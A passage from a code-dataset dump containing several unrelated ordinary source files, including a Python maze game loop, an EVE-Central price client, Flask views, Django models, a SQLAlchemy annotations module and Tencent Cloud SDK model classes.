firescroll.destroy()\r\n info.fire_scroll+=1\r\n info.show_fire_scroll()\r\n winsound.PlaySound(\".\\\\sound\\\\scroll.wav\", winsound.SND_ASYNC)\r\n\r\n\r\n for healing in healings:\r\n\r\n if player.is_collision(healing):\r\n\r\n healing.destroy()\r\n info.potion+=1\r\n info.show_healthpotion()\r\n winsound.PlaySound(\".\\\\sound\\\\potion.wav\", winsound.SND_ASYNC)\r\n \r\n\r\n for crown in crowns:\r\n \r\n if player.is_collision(crown):\r\n \r\n #winsound.PlaySound(\".\\\\sound\\\\victory.wav\",0)\r\n player.destroy()\r\n crown.destroy()\r\n crowns.remove(crown)\r\n lives=3\r\n game.win()\r\n \r\n \r\n for enemy in enemies:\r\n if missile.is_collision(enemy):\r\n enemy.hp -= (info.strength+info.weaponstats)\r\n missile.status = \"ready\"\r\n winsound.PlaySound(\".\\\\sound\\\\orkdeath.wav\", winsound.SND_ASYNC)\r\n\r\n if missile2.is_collision(enemy):\r\n enemy.hp -= missile2.damage\r\n missile2.status = \"ready\"\r\n winsound.PlaySound(\".\\\\sound\\\\orkdeath.wav\", winsound.SND_ASYNC)\r\n\r\n\r\n if enemy.hp<=0 and enemy.alive==True:\r\n enemy.alive=False \r\n Enemy.destroy(enemy)\r\n missile.status = \"ready\"\r\n info.exp += enemy.exp\r\n info.boss+=enemy.boss\r\n info.kill+=1\r\n info.show_exp()\r\n winsound.PlaySound(\".\\\\sound\\\\orkdeath.wav\", winsound.SND_ASYNC)\r\n\r\n if info.exp>70 and info.level2_claimed:\r\n info.hp=1100\r\n info.fullhp=1100\r\n info.strength=20\r\n info.defense=4\r\n info.level=2\r\n info.level2_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n \r\n\r\n if info.exp>150 and info.level3_claimed:\r\n 
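# level 3 reached: raise the stat block and clear the claim flag so it only fires once\r\n 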
info.hp=1200\r\n info.fullhp=1200\r\n info.strength=25\r\n info.defense=8\r\n info.level=3\r\n info.level3_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n \r\n if info.exp>300 and info.level4_claimed:\r\n info.hp=1300\r\n info.fullhp=1300\r\n info.strength=30\r\n info.defense=12\r\n info.level=4\r\n info.level4_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n \r\n\r\n if info.exp>450 and info.level5_claimed:\r\n info.hp=1500\r\n info.fullhp=1500\r\n info.strength=40\r\n info.defense=20\r\n info.level=5\r\n info.level5_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n\r\n if info.exp>700 and info.level6_claimed:\r\n info.hp=1700\r\n info.fullhp=1700\r\n info.strength=60\r\n info.defense=25\r\n info.level=6\r\n info.level6_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC)\r\n time.sleep(1)\r\n\r\n if info.exp>950 and info.level7_claimed:\r\n info.hp=2000\r\n info.fullhp=2000\r\n info.strength=80\r\n info.defense=30\r\n info.level=7\r\n info.level7_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC) \r\n time.sleep(1)\r\n\r\n if info.exp>1400 and info.level8_claimed:\r\n info.hp=2200\r\n info.fullhp=2200\r\n info.strength=100\r\n info.defense=50\r\n info.level=8\r\n info.level8_claimed = False\r\n info.show_defense()\r\n info.show_health()\r\n info.show_strength()\r\n info.show_level()\r\n winsound.PlaySound(\".\\\\sound\\\\levelup.wav\", winsound.SND_ASYNC) \r\n time.sleep(1)\r\n \r\n for coin in coins:\r\n if player.is_collision(coin):\r\n game.gold += coin.gold\r\n game.show_gold()\r\n #print(\"Player Gold: {}\".format (game.gold))\r\n coin.destroy()\r\n coins.remove(coin)\r\n winsound.PlaySound(\".\\\\sound\\\\coin.wav\", winsound.SND_ASYNC)\r\n\r\n for enemy in enemies:\r\n if player.is_collision(enemy):\r\n attack=enemy.damage\r\n reduce_damage=attack-(info.defense+game.armourstats)\r\n if reduce_damage <0 :\r\n reduce_damage=0\r\n\r\n info.hp-=reduce_damage\r\n info.show_health()\r\n\r\n for particle in particles:\r\n particle.explode(player.xcor(), player.ycor())\r\n\r\n for door in doors:\r\n if player.is_collision(door):\r\n walls.clear()\r\n pen.clear()\r\n wn.bgpic(\".\\\\art\\\\black.gif\")\r\n for enemy in enemies:\r\n Enemy.destroy(enemy)\r\n for coin in coins:\r\n Coin.destroy(coin)\r\n for door in doors:\r\n Door.destroy(door)\r\n for armour in armours:\r\n Armour.destroy(armour)\r\n for sword in swords:\r\n Sword.destroy(sword)\r\n for healing in healings:\r\n Healing.destroy(healing)\r\n for firescroll in firescrolls:\r\n Firescroll.destroy(firescroll)\r\n for npc in npcs:\r\n Npc.destroy(npc)\r\n for quest in quests:\r\n Quest.destroy(quest)\r\n for quest_item in quest_items:\r\n Quest_item.destroy(quest_item)\r\n for fake_wall in fake_walls:\r\n Fake_wall.destroy(fake_wall)\r\n for quest2 in quests2:\r\n Quest2.destroy(quest2)\r\n \r\n 
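# the old level is fully torn down; play the unlock sound and build the next maze\r\n 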
winsound.PlaySound(\".\\\\sound\\\\unlock.wav\", winsound.SND_ASYNC)\r\n \r\n if maze==(\"level1\"):\r\n \r\n setup_maze(levels[2])\r\n maze=(\"level2\")\r\n \r\n \r\n elif maze ==(\"level2\"):\r\n setup_maze(levels[3])\r\n maze=(\"level3\")\r\n \r\n \r\n elif maze==(\"level3\"):\r\n setup_maze(levels[4])\r\n maze=(\"level4\")\r\n \r\n\r\n elif maze==(\"level4\"):\r\n setup_maze(levels[5])\r\n maze=(\"level5\")\r\n\r\n elif maze==(\"level5\"):\r\n setup_maze(levels[6])\r\n maze=(\"level6\")\r\n\r\n elif maze==(\"level6\"):\r\n setup_maze(levels[7])\r\n maze=(\"level7\")\r\n\r\n elif maze==(\"level7\"):\r\n setup_maze(levels[8])\r\n maze=(\"level8\") \r\n \r\n else:\r\n pass\r\n \r\n for enemy in enemies:\r\n turtle.ontimer(enemy.move(walls,player),t=250)\r\n \r\n if info.hp<=0:\r\n game.dead()\r\n player.destroy()\r\n winsound.PlaySound(\".\\\\sound\\\\death.wav\", winsound.SND_ASYNC)\r\n time.sleep(2)\r\n info.show_health()\r\n break\r\n \r\n wn.update()\r\n","sub_path":"misc/enemy game.py","file_name":"enemy game.py","file_ext":"py","file_size_in_byte":26797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65714848","text":"from xml.dom import minidom\nfrom google.appengine.api import memcache, urlfetch\n\nclass api(object):\n '''\n classdocs\n '''\n\n def readType(self, data):\n buyOrderPrice = data.getElementsByTagName('buy')[0].getElementsByTagName('max')[0].firstChild.data\n sellOrderPrice = data.getElementsByTagName('sell')[0].getElementsByTagName('min')[0].firstChild.data\n memcache.Client().set('Price/%s' % (data.getAttribute('id')),[float(buyOrderPrice), float(sellOrderPrice)],time=3600)\n #print data.getAttribute('id') + \": \" + buyOrderPrice, sellOrderPrice\n \n def httpGetPricesXML(self,itemIDs):\n params = ''\n cache = memcache.Client()\n for item in itemIDs:\n if cache.get('Price/%s' % item) is None:\n params += 'typeid=%s&' % (item)\n if params != '':\n params += 'usesystem=30000142' #Jita system\n response = urlfetch.fetch(url='http://api.eve-central.com/api/marketstat?%s' % (params),method=urlfetch.GET,deadline=60)\n if response.status_code == 200:\n result = response.content\n else:\n raise ValueError('HTTP Request failed with status code %s' % response.status_code)\n else:\n result = None\n return result\n \n def getPrice(self, itemIDs):\n if type(itemIDs) is str:\n items = [int(itemIDs)]\n elif type(itemIDs) is long:\n items = [int(itemIDs)]\n elif type(itemIDs) is int:\n items = [itemIDs]\n elif type(itemIDs) is list:\n items = itemIDs\n \n items = self.unique(items)\n xmlresponse = self.httpGetPricesXML(items)\n if xmlresponse is not None: \n doc = minidom.parseString(xmlresponse)\n if doc.documentElement.tagName == 'evec_api':\n for each in doc.getElementsByTagName(\"type\"):\n self.readType(each)\n \n def unique(self, seq):\n seen = set()\n seen_add = seen.add\n return [ x for x in seq if x not in seen and not seen_add(x)]","sub_path":"evecentralapi.py","file_name":"evecentralapi.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"6559203","text":"\nfrom flask import render_template,flash,redirect\nfrom app import app\nfrom forms import LoginForm\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\n\t#fake user object\n\tuser = {'nickname':'ming'}\n\n\tposts = [\n\t\t\t{\n\t\t\t\t'author':{'nickname':'John'},\n\t\t\t\t'body':'Beautiful day in 
AnHui'\n\t\t\t},\t\n\t\t\t{\n\t\t\t\t'author':{'nickname':'Bing'},\n\t\t\t\t'body':'The Avengers movie was so cool!'\n\t\t\t}\n\t\t]\n\treturn render_template('index.html',title='Home',user=user,posts = posts)\n\n@app.route('/login',methods=['GET','POST'])\ndef login():\n\tform = LoginForm()\n\tif form.validate_on_submit():\n\t\t#flash('Login requested for OpenID=%s,remember_me=%s '\\\n\t\t#\t\t%(form.openid.data,str(form.remember_me.data)))\n\t\t\n\t\tflash('Login requested for OpenID=%s,remember_me=%s '\\\n\t\t\t\t%(form.openid.data,str(form.remember_me.data)))\n\t\treturn redirect('/index')\n\treturn render_template('login.html',title='Sigin In',\\\n\t\t\tform = form,providers=app.config['OPENID_PROVIDERS'])\n\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195720855","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n\nclass Collection(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n name = models.CharField(db_column='Name', null=True)\n\n class Meta:\n managed = False\n db_table = 'Collection'\n\nclass WeaponModel(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n name = models.CharField(db_column='Name', null=True)\n\n class Meta:\n managed = False\n db_table = 'WeaponModel'\n\nclass WeaponGrade(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n rank = models.IntegerField(db_column='Rank', null=True)\n name = models.CharField(db_column='Name', null=True)\n\n class Meta:\n managed = False\n db_table = 'WeaponGrade'\n\nclass CollectionItem(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n name = models.CharField(db_column='Name', null=True)\n float_min = models.DecimalField(db_column='FloatMin', max_digits=5, decimal_places=3)\n float_max = models.DecimalField(db_column='FloatMax', max_digits=5, decimal_places=3)\n stat_trak = models.BooleanField(db_column='StatTrak')\n souvenir = models.BooleanField(db_column='Souvenir')\n factory_new = models.BooleanField(db_column='FactoryNew')\n minimal_wear = models.BooleanField(db_column='MinimalWear')\n field_tested = models.BooleanField(db_column='FieldTested')\n well_worn = models.BooleanField(db_column='WellWorn')\n battle_scarred = models.BooleanField(db_column='BattleScarred')\n collection = models.ForeignKey(Collection, db_column='Collection')\n weapon_grade = models.ForeignKey(WeaponGrade, db_column='WeaponGrade')\n weapon_model = models.ForeignKey(WeaponModel, db_column='WeaponModel')\n\n class Meta:\n managed = False\n db_table = 'CollectionItem'\n\nclass SteamMarketUrl(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n url = models.CharField(db_column='Url', null=True)\n market_hash_name = models.CharField(db_column='market_hash_name', null=True)\n stat_trak = models.BooleanField(db_column='StatTrak')\n souvenir = models.BooleanField(db_column='Souvenir')\n factory_new = models.BooleanField(db_column='FactoryNew')\n minimal_wear = models.BooleanField(db_column='MinimalWear')\n field_tested = models.BooleanField(db_column='FieldTested')\n well_worn = models.BooleanField(db_column='WellWorn')\n battle_scarred = models.BooleanField(db_column='BattleScarred')\n collection_item = models.ForeignKey(CollectionItem, db_column='CollectionItem')\n\n class Meta:\n managed = False\n db_table = 'SteamMarketUrl'\n\nclass MarketData(models.Model):\n id = 
models.AutoField(db_column='Id', primary_key=True)\n price = models.DecimalField(db_column='Price', max_digits=8, decimal_places=3)\n currency_id = models.IntegerField(db_column='CurrencyId', null=True)\n time_seen = models.DateTimeField(db_column='TimeSeen')\n market_url = models.ForeignKey(SteamMarketUrl, db_column='MarketUrl')\n\n class Meta:\n managed = False\n db_table = 'MarketData'\n\nclass Currency(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n name = models.CharField(db_column='Name', null=True)\n exchange_rate = models.DecimalField(db_column='ExchangeRate', max_digits=16, decimal_places=8)\n\n class Meta:\n managed = False\n db_table = 'Currency'\n\nclass LatestPrice(models.Model):\n id = models.AutoField(db_column='Id', primary_key=True)\n steam_market_url = models.ForeignKey(SteamMarketUrl, db_column='SteamMarketUrl')\n average_price = models.DecimalField(db_column='AveragePrice', max_digits=8, decimal_places=3)\n time_seen = models.DateTimeField(db_column='TimeSeen')\n\n class Meta:\n managed = False\n db_table = 'LatestPrice'\n","sub_path":"www/bin/csgoskin/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148803966","text":"\"\"\"DataConvert \n\nThe DataConvert class just a service that class convert data in different format.\nIn this class we are reading DAT, STM and ecodedXmlFile\n\n\"\"\"\n\n# importing for libraries\nimport numpy\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom xml.etree import ElementTree\nimport base64\nimport urllib2\nimport xmltodict\nfrom core.services.DatabaseConnection import *\nfrom core.persistence.CostData import *\n\nclass DataConvert: \n \"\"\"Reading DAT, STM and ecodedXmlFile file.\n\n This class convert data and reading DAT, STM and ecodedXmlFile from specific folder location\n\n \"\"\"\n\n @staticmethod\n def readSTM(lane, user_folder, n): \n \"\"\"Reading STM value from CSV and return detail of particular lane.\n Note:\n This is static method so call this function by statically\n like DataConvert.readSTM.\n Args:\n lane(str): the name of the lane.\n user_folder(str): the user_folder is folder location (location of the files)\n n(int): n is number of days\n Returns:\n context (this is combination of two values tableData and recent_cost_table_data)\n \"\"\" \n try:\n origin = lane[:4] # Origin_PR\n dest = lane[-4:] # Dest_PR\n\n #make connection with database\n con = DatabaseConnection.connectWithDB()\n\n #get query result \n input_df = CostData.queryToGetCostData(origin, dest, n, con)\n #close database connection\n con.close()\n\n input_df['PR_Lane'] = input_df['Origin_PR'] + input_df['Dest_PR']\n\n if input_df.empty:\n context = {'tableData': '', 'recent_cost_table_data': ''}\n else:\n slice2 = input_df[[\"CreateDate_EST\", 'PR_Lane', 'Carrier_Name', 'Customer_LHL']]\n sorted_array = slice2.sort([\"CreateDate_EST\"], ascending=False)\n g = sorted_array.groupby(['PR_Lane', 'Carrier_Name'])\n recent = (g['Customer_LHL'].first()).astype(float)\n # get second last record\n nth = (g.nth(1).fillna(value=0).reset_index())\n # get sum of accepted data\n countAccepted = (g['Carrier_Name'].count())\n # get top 10 records\n final = pd.DataFrame({'countAccepted': countAccepted, 'LH_COST_RECENT': recent}).fillna(\n value=0).reset_index()\n fData = []\n # sort according to the recent cost\n fData = final.sort([\"LH_COST_RECENT\"], ascending=True).head(10)\n # convert data 
nparray = numpy.array(fData)\n                tableData = nparray.tolist()\n                # the second most recent record, also as a plain list\n                recent_cost = nth\n                recent_cost_array = numpy.array(recent_cost)\n                recent_cost_table_data = recent_cost_array.tolist()\n\n                context = {'tableData': tableData, 'recent_cost_table_data': recent_cost_table_data}\n            return context\n        except Exception:\n            context = {'tableData': '', 'recent_cost_table_data': ''}\n            return context\n\n","sub_path":"core/services/DataConvert.py","file_name":"DataConvert.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622480001","text":"#! /usr/bin/env python\n\nfrom scipy.io import wavfile\nfrom scipy.interpolate import interp1d\nimport damage, recognize, utils, evaluate\n\nsample_rate, samples = wavfile.read('songs/hakuna_matata.wav')\n\nnewsamples = samples.copy()\ndamage.zerofill(newsamples, 0.5)\nwavfile.write('songs/zerofill_hakuna_matata.wav', sample_rate, newsamples)\n\nmatches = recognize.cheat(samples, newsamples, false_negatives=0.01)\nvalidx, validy = utils.tovalidxy(newsamples, matches)\nf = interp1d(validx, validy, fill_value='extrapolate')\n\ninvalidx = utils.invalidx(matches)\nfixedy = f(invalidx)\n\nutils.replace(newsamples, invalidx, fixedy)\nwavfile.write('songs/zerofill_cheat_linear_hakuna_matata.wav', sample_rate, newsamples)\n\nevaluate.study(samples, newsamples, matches=matches)\n","sub_path":"investigation/wav/linear.output.example.py","file_name":"linear.output.example.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"208803918","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom utils import FileManager\nfrom os import path as os_path\nimport os, io\nimport sys\nimport shutil\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nrootDir = \"../我的对对对源文件innerclass\"\ndestDir = \"../app/src/main/java/\"\nmapping = {}\n\n\nclass item:\n    def __init__(self):\n        self.value = ''\n        self.isSubclass = False\n\ndef traversal(basicDir):\n    getMapping()\n    fileList = FileManager.lsAllFile(basicDir)\n    for f in fileList:\n        alter(f)\n\n\ndef getMapping():\n    for line in open(\"replacemap.txt\", \"r\"):  # open the mapping file and read it line by line\n        array = line.strip().split(',', 1)\n        mapping[array[0]] = array[1]\n    print(\"mapping: \" + str(mapping))\n\n\ndef alter(file):\n    if os_path.basename(file).startswith(\".\"):\n        return\n\n    new_file = file.replace(rootDir, destDir)\n    b, new_file = replaceString(new_file)\n    if not os.path.exists(os_path.dirname(new_file)):\n        os.makedirs(os_path.dirname(new_file))\n\n    if os.path.exists(new_file):\n        os.remove(new_file)\n\n    with io.open(file, \"r\", encoding=\"utf-8\") as f1, io.open(new_file, \"w\", encoding=\"utf-8\") as f2:\n        for line in f1:\n            has_replace, newline = replaceString(line)\n            if has_replace:\n                print(\"alterfile: \" + line + \" - > \" + newline)\n            f2.write(newline)\n\n    f1.close()\n    f2.close()\n\n\ndef replaceString(line):\n    needNotice = line.startswith(\"import \")\n    has_replace = False\n    old_line = line\n    for old, new in mapping.items():\n        if old in line:\n            has_replace = True\n            if needNotice and len(new.split('.')) > 1:\n                new = new.rsplit('.', 1)[0]\n            line = line.replace(old, new)\n\n    # if has_replace:\n    #     print(\"replaceString: \" + old_line + \" - > \" + line)\n    return has_replace, line\n\n\nif __name__ == '__main__':\n    print(\"start replacement\")\n    if os.path.exists(destDir):\n        shutil.rmtree(destDir)  # recursively delete the old output tree\n    
else:\n os.makedirs(destDir)\n traversal(rootDir)\n","sub_path":"py/replacejava.py","file_name":"replacejava.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489704070","text":"\"\"\"\nSQLAlchemy attribute annotations\n--------------------------------\n\nAnnotations are strings attached to attributes that serve as a programmer\nreference on how those attributes are meant to be used. They can be used to\nindicate that a column's value should be :attr:`immutable` and should never\nchange, or that it's a :attr:`cached` copy of a value from another source\nthat can be safely discarded in case of a conflict.\n\nThis module's exports may be imported via :mod:`coaster.sqlalchemy`.\n\nSample usage::\n\n from coaster.db import db\n from coaster.sqlalchemy import annotation_wrapper, immutable\n\n natural_key = annotation_wrapper('natural_key', \"Natural key for this model\")\n\n class MyModel(db.Model):\n __tablename__ = 'my_model'\n id = immutable(db.Column(db.Integer, primary_key=True))\n name = natural_key(db.Column(db.Unicode(250), unique=True))\n\n @classmethod\n def get(cls, **kwargs):\n for key in kwargs:\n if key in cls.__column_annotations__[natural_key.name]:\n return cls.query.filter_by(**{key: kwargs[key]}).one_or_none()\n\nAnnotations are saved to the model's class as a ``__column_annotations__``\ndictionary, mapping annotation names to a list of attribute names, and to a\nreverse lookup ``__column_annotations_by_attr__`` of attribute names to annotations.\n\"\"\"\n\nfrom collections.abc import Hashable\nfrom typing import Any, Dict\n\nfrom sqlalchemy import event\nfrom sqlalchemy.orm import ColumnProperty, RelationshipProperty, SynonymProperty, mapper\nfrom sqlalchemy.orm.attributes import QueryableAttribute\nfrom sqlalchemy.schema import SchemaItem\n\nfrom ..signals import coaster_signals\n\ntry: # SQLAlchemy >= 1.4\n from sqlalchemy.orm import MapperProperty # type: ignore[attr-defined]\nexcept ImportError: # SQLAlchemy < 1.4\n from sqlalchemy.orm.interfaces import MapperProperty\n\n__all__ = ['annotations_configured', 'annotation_wrapper']\n\n# Global dictionary for temporary storage of annotations until the\n# mapper_configured events\n__cache__: Dict[Any, list] = {}\n\n# --- Signals -----------------------------------------------------------------\n\nannotations_configured = coaster_signals.signal(\n 'annotations-configured',\n doc=\"Signal raised after all annotations on a class are configured\",\n)\n\n\n# --- SQLAlchemy signals for base class ---------------------------------------\n\n\n@event.listens_for(mapper, 'mapper_configured')\ndef _configure_annotations(mapper_, cls):\n \"\"\"\n Extract annotations from attributes.\n\n Run through attributes of the class looking for annotations from\n :func:`annotation_wrapper` and add them to :attr:`cls.__column_annotations__`\n and :attr:`cls.__column_annotations_by_attr__`\n \"\"\"\n annotations = {}\n annotations_by_attr = {}\n\n # An attribute may be defined more than once in base classes. 
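(Think of mixins: the same column declared on two base classes.) 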
Only handle the first definition found.\n    processed = set()\n\n    # Loop through all attributes in the class and its base classes,\n    # looking for annotations\n    for base in cls.__mro__:\n        for name, attr in base.__dict__.items():\n            if name in processed or name.startswith('__'):\n                continue\n\n            if isinstance(attr, QueryableAttribute) and isinstance(\n                getattr(attr, 'original_property', None), SynonymProperty\n            ):\n                # Skip synonyms\n                data = None\n            # 'data' is a list of string annotations\n            elif isinstance(attr, Hashable) and attr in __cache__:\n                data = __cache__[attr]\n            elif hasattr(attr, '_coaster_annotations'):\n                data = attr._coaster_annotations\n            elif isinstance(\n                attr, (QueryableAttribute, RelationshipProperty, MapperProperty)\n            ):\n                if attr.property in __cache__:\n                    data = __cache__[attr.property]\n                elif '_coaster_annotations' in attr.info:\n                    data = attr.info['_coaster_annotations']\n                elif hasattr(attr.property, '_coaster_annotations'):\n                    data = getattr(attr.property, '_coaster_annotations')\n                else:\n                    data = None\n            else:\n                data = None\n            if data is not None:\n                annotations_by_attr.setdefault(name, []).extend(data)\n                for a in data:\n                    annotations.setdefault(a, []).append(name)\n                processed.add(name)\n\n    # Classes specifying ``__column_annotations__`` directly aren't supported,\n    # so we don't bother preserving existing content, if any.\n    if annotations:\n        cls.__column_annotations__ = annotations\n    if annotations_by_attr:\n        cls.__column_annotations_by_attr__ = annotations_by_attr\n    annotations_configured.send(cls)\n\n\n# --- Helpers -----------------------------------------------------------------\n\n\ndef annotation_wrapper(annotation, doc=None):\n    \"\"\"Define an annotation, which can be applied to attributes in a database model.\"\"\"\n\n    def decorator(attr):\n        __cache__.setdefault(attr, []).append(annotation)\n        # Also mark the annotation on the object itself. This will\n        # fail if the object has a restrictive __slots__, but it's\n        # required for some objects like Column because SQLAlchemy copies\n        # them in subclasses, changing their hash and making them\n        # undiscoverable via the cache.\n        if isinstance(attr, SynonymProperty):\n            raise TypeError(\n                \"Synonyms cannot have annotations; set it on the referred attribute\"\n            )\n        if isinstance(attr, (SchemaItem, ColumnProperty, MapperProperty)):\n            attr.info.setdefault('_coaster_annotations', []).append(annotation)\n        else:\n            try:\n                if not hasattr(attr, '_coaster_annotations'):\n                    setattr(attr, '_coaster_annotations', [])\n                attr._coaster_annotations.append(annotation)\n            except AttributeError:\n                pass\n        return attr\n\n    decorator.__name__ = decorator.name = annotation\n    decorator.__doc__ = doc\n    return decorator\n","sub_path":"coaster/sqlalchemy/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552681403","text":"# # # # # # # # # # # # # # # # # # # # # # # #\r\n#                                             #\r\n#    Module to run the condition module       #\r\n#    By: David Alvarez                        #\r\n#    08-11-2020                               #\r\n#    Version Alpha-0.1                        #\r\n#                                             #\r\n# # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\nfrom PywerAPM_Case_Setting import *\r\n\r\nfrom APM_Module import APM\r\nfrom Processing_tools import Report_APM_df, Report_APM_Meta_data, Report_ACM_Meta_data\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\n# results_path = 'RESULTS/'\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n#                     Run criticality                       #\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\ndef run_criticality():\r\n    import PywerACM_Main\r\n    df = PywerACM_Main.run_ACM(N)\r\n    store = pd.HDFStore(results_path+'Results_ACM.h5')\r\n    store.put('df', df)\r\n    store.get_storer('df').attrs['TITLE'] = 'ACM_Report'\r\n    date = datetime.date(datetime.now())\r\n    print(date)\r\n    store.get_storer('df').attrs['Date'] = date\r\n    store.close()\r\n\r\n\r\ndef load_criticality(cr_type='Monte_Carlo', assets=None):\r\n    if cr_type == 'Monte_Carlo':  # load Monte Carlo simulations\r\n        store = pd.HDFStore(results_path+'Results_ACM.h5')\r\n        df = store['df']\r\n        store.close()\r\n    else:  # fixed conditions\r\n        df = assets.copy()\r\n        df_type = {}\r\n        df_group = assets.groupby(['Disc_Type'])\r\n        for group in df_group:  # read criticality by type of asset\r\n            name = group[0]\r\n            df_type = pd.read_excel(cr_type, sheet_name=name, usecols=\"A:H\")\r\n            for index, row in df_type.iterrows():\r\n                df.loc[(df.Disc_Type==name) & (df.Asset_To_Disconet==row.Asset), ['Cr_Env','Cr_Sec','Cr_Leg']] = [row.ENVIRONMENTAL, row.SECURITY, row.LEGAL]\r\n        # Total criticality\r\n        df['T_Cr'] = df['Cr_Env']+df['Cr_Sec']+df['Cr_Leg']+df['Cr_Fin']\r\n    return df\r\n\r\n# Generate the condition report\r\ndef Generate_Report_Risk(DF_ACP, DF_sum):\r\n    from R1_Reports import Test_Report_AC\r\n    Test_Report_AC(report_data, DF_ACP, DF_sum, years, N)\r\n","sub_path":"APM/BIN/ARM_Run.py","file_name":"ARM_Run.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620215529","text":"# -*- coding: utf8 -*-\n# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom tencentcloud.common.abstract_model import AbstractModel\n\n\nclass DataPoint(AbstractModel):\n \"\"\"监控数据点\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Dimensions: 实例对象维度组合\n :type Dimensions: list of Dimension\n :param Timestamps: 时间戳数组,表示那些时间点有数据,缺失的时间戳,没有数据点,可以理解为掉点了\n :type Timestamps: list of float\n :param Values: 监控值数组,该数组和Timestamps一一对应\n :type Values: list of float\n \"\"\"\n self.Dimensions = None\n self.Timestamps = None\n self.Values = None\n\n\n def _deserialize(self, params):\n if params.get(\"Dimensions\") is not None:\n self.Dimensions = []\n for item in params.get(\"Dimensions\"):\n obj = Dimension()\n obj._deserialize(item)\n self.Dimensions.append(obj)\n self.Timestamps = params.get(\"Timestamps\")\n self.Values = params.get(\"Values\")\n\n\nclass DescribeBaseMetricsRequest(AbstractModel):\n \"\"\"DescribeBaseMetrics请求参数结构体\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Namespace: 业务命名空间\n :type Namespace: str\n :param MetricName: 指标名\n :type MetricName: str\n \"\"\"\n self.Namespace = None\n self.MetricName = None\n\n\n def _deserialize(self, params):\n self.Namespace = params.get(\"Namespace\")\n self.MetricName = params.get(\"MetricName\")\n\n\nclass DescribeBaseMetricsResponse(AbstractModel):\n \"\"\"DescribeBaseMetrics返回参数结构体\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param MetricSet: 查询得到的指标描述列表\n :type MetricSet: list of MetricSet\n :param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。\n :type RequestId: str\n \"\"\"\n self.MetricSet = None\n self.RequestId = None\n\n\n def _deserialize(self, params):\n if params.get(\"MetricSet\") is not None:\n self.MetricSet = []\n for item in params.get(\"MetricSet\"):\n obj = MetricSet()\n obj._deserialize(item)\n self.MetricSet.append(obj)\n self.RequestId = params.get(\"RequestId\")\n\n\nclass Dimension(AbstractModel):\n \"\"\"实例对象的维度组合\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Name: 实例维度名称\n :type Name: str\n :param Value: 实例维度值\n :type Value: str\n \"\"\"\n self.Name = None\n self.Value = None\n\n\n def _deserialize(self, params):\n self.Name = 